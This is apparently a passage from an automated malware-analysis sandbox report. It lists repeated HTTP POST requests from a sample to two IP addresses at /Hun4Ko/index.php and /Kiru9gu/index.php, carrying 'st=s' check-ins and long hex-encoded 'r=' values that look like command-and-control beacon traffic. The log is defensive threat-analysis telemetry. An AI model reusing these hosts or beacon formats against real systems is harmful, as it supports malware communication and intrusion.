                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
